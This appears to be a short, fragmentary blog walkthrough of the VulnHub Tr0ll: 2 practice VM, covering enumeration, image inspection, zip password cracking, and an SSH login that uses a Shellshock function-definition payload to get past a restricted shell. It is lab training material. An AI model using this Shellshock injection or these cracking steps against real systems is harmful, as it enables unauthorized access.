TR0LL: 2 Walkthrough

The next machine in the Tr0ll series of VMs. This one is a step up in difficulty from the original Tr0ll but the time required to solve is…

The next machine in the Tr0ll series of VMs. This one is a step up in difficulty from the original Tr0ll but the time required to solve is approximately the same, and make no mistake, trolls are still present! :)

Difficulty is beginner++ to intermediate.

Tr0ll: 2
Please remember that VulnHub is a free community resource so we are unable to check the machines that are provided to…

Enumeration

We have got,

  1. ftp
  2. ssh
  3. http

Always keep HTTP at the end.

More Enumeration…

  • FTP
  • SSH
  • HTTP
  1. Manual Testing
VIM is present + Username Tr0ll

2. Nikto Scan

Nothing Critical

3. Gobuster + Dirb

i found nothing here…

It seems to be a real troll….😩

Let’s think what all files we get from the target, some text docs + images.

let’s look deep into images …

strings *.jpg

Let’s look into y0ur_self,


Finding the Point Of Intrusion

Before starting it, kindly do the base64 decode

base64 -d answer.txt > list

No luck,,,

Try Troll:Troll

cracked: ItCantReallyBeThisEasyRightLOL

Ref: https://linuxconfig.org/how-to-crack-zip-password-on-kali-linux

we got RSA file for noob

Let’s login

ssh noob@192.168.103.173 -i noob ‘() { :;}; /bin/bash’
Shellshock OpenSSH restricted shell RCE/PE Proof of Concept
Synopsis: The sshd daemon used in OpenSSH supports a ForceCommand directive, allowing shell logins to be restricted to…